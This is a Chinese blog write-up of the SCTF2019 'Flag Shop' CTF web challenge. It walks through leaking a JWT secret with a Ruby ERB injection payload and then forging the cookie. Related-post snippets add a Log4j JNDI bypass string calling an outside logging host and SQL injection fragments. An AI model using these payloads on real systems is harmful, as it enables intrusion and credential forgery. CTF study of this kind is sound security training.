BUUCTF-[SCTF2019]Flag Shop

最新推荐文章于 2024-03-06 08:54:51 发布
最新推荐文章于 2024-03-06 08:54:51 发布
阅读量4.3k 收藏 1
点赞数 1
分类专栏: BUU-WEB 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/121137365
版权

[SCTF2019]Flag Shop

在这里插入图片描述
简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag)
这三个按钮干不成大事,目录扫描,扫到robots.txt
在这里插入图片描述
查看页面备份文件
在这里插入图片描述
这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~
问题不大,看到了JWT,先抓个包看一下,
在这里插入图片描述

在这里插入图片描述
找到了jkl的位置,但是缺少密钥对其进行加密。
想要获取密钥只能通过/work页面
在这里插入图片描述
根据Ruby ERB注入,构造payload
如果传入的参数do和name一致,则会输出{params[:name][0,7]} working successfully!
使用Ruby的预定义变量$'
name=<%=$'%>&do=<%=$'%> is working&SECRET=
进行url编码
name=%3C%25=$%27%25%3E&do=%3C%25=$%27%25%3E%20is%20working&SECRET=
在这里插入图片描述
成功获取secret密钥后,对JWT进行修改加密
在这里插入图片描述
然后后伪造cookie
在这里插入图片描述
JWT解密
在这里插入图片描述

TzZzEZ-web
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是...
SCTF2020:SCTF2020
04-01
【SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
[SCTF2019]Flag Shop
fmyyy1的博客
04-20 455
场景 第一反应是修改价格或者修改钱的数量,抓包。 将cookie用jwt解码一下 将jkl修改成价格后编码发送没有反应。应该还缺点什么。参考wp,访问robots.txt,看到/filebak require 'sinatra' require 'sinatra/cookies' require 'sinatra/json' require 'jwt' require 'securerandom' require 'erb' set :public_folder, File.dirname(__FI
BUUCTF-MISC-[SCTF2019]电单车1
最新发布
苏生要努力
03-06 429
下载附件,是一个音频文件,拖入看看考的知识点是PT2242信号 有长有短,短的为0,长的为1化出来。
BUUCTF [SCTF2019]creakme 题解
sirrior的博客
12-04 450
这个函数是void类型,但是在反调试函数后有一个return,这会导致程序异常。有aes加密,追踪一下,发现是sub_4020d0内进行加密,base64在aes里。没法反编译,看汇编吧。v3+=40后变成了.sctf,继续在数据段往下看看,+=40后是.data 可见是数据段的名字。异或在取反,这里笔者本来想patch掉反调试函数后自动解密,不知为何patch后一片飘红。GetModuleHandleW函数返回指定模块的句柄,进入402320看看。这段代码是设置函数的栈帧和设置数据,为异常调试做准备。
BUUCTF-[SCTF2019]babyre1
weixin_61154173的博客
02-10 744
我们发现后面有v11,v12,v13,v14。在根据这4个数据在堆栈中的位置,可以知道这四个就是v10[26],v10[27],v10[28],v10[29],知道这些,又是异或操作那不就可以向前异或求出v10的前四个元素了嘛。用户输入为v15,从操作可以看出w向上,s向下,a向左,d向右,x向下走一个迷宫大小,y向上走一个迷宫大小。这里是真没看出来是什么,经过查阅wp,部分师傅是用爆破求出,有的则看出这是base64的解密过程,我通过把'sctf_9102'进行base64加密就是正确的input2。
BUUCTF[SCTF2019]Who is he题解
a5555678744的博客
07-01 576
简介 一道unity逆向题,这个unity本身嘛。。虽然不是重点,但是各位师傅看的时候千万别喝水。 话说回来,虽然是unity逆向,但是这道题有点特例独行,一般unity的关键信息都会放在assembly-Csharp.dll里面,这道题看似也不例外,但是得到的却是假答案。真正的答案需要依靠动态调试来慢慢找。 题解 先运行下程序 啊这。。 随便输入点什么,发现会发一个info:emmmm。。。。这样的提示 把exe拖进x64debug 由于是unity的程序,直接查字符串不一定管
BUUCTF--[HDCTF2019]Maze
Hk_Mayfly的博客
04-16 1521
测试文件:https://lanzous.com/ibh0xhi 脱壳 获取信息 32位文件 upx壳 代码分析 看名字就知道,应该就是用几个符号代表方向,让我们走迷宫。打开字符串窗口看了看 星号那段就是迷宫了,总共70个字符。 找到main函数,发现0x40102E有莫名的指令,直接使用OD nop掉,转存到新文件。 得到了新文件,打开main函数 int _...
BUUCTF:[SCTF2019]Ready_Player_One
末初的CSDN博客
07-30 1075
题目地址:https://buuoj.cn/challenges#[SCTF2019]Ready_Player_One Unity游戏,开着飞机按W往上冲到上面去就有flag了哈哈哈哈哈哈哈哈 flag{You_Are_The_Ready_Player_One!!!For_Sure!!!}
BUUCTF:sctf_2019_easy_heap
weixin_51055545的博客
01-04 1292
例行检查一下程序: 64位的一道堆题,放到IDA中看下: 首先看到一个菜单:
SEBA\SCTF-DL3手册(英语版)
12-02
根据给定的文件信息,我们可以深入探讨SEBA\SCTF-DL3流量计的手册,了解其技术规格、功能及应用。以下是对标题、描述、标签以及部分内容的详细解析: ### 1. 通用规格 SEBA\SCTF-DL3是一款由韩国SEBA公司生产的...
sctf2018-NginxSecret:sctf2018-Nginx秘密
05-10
readme开启或者关闭docker环境docker-compose builddocker-compose up -ddocker-compose down手动开启botbot.py需要手动开启,登陆admin B3P#9!3J%#1dFp%&。拿到cookie加在py中对应的地方即可。
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7366
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3257
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2938
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[长安杯]web-shiro复现
qq_24033605的博客
01-12 2221
长安杯-shiro?复现 浏览器显示是springboot框架 登录伪造shiro,关键词为remeber-me shiro直接打,打不进去 springboot还可以写log4j漏洞,测试一下 jndi被过滤了 进行绕过 ${${::-j}ndi:rmi://py2hu7.ceye.io/exp} 成功接收到dnslog信息。 构建jndi反弹shell,这里反弹shell的命令需要bypass一下 在这里插入代码片 反弹的有点慢,但是可以成功反弹shell并拿取flag。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值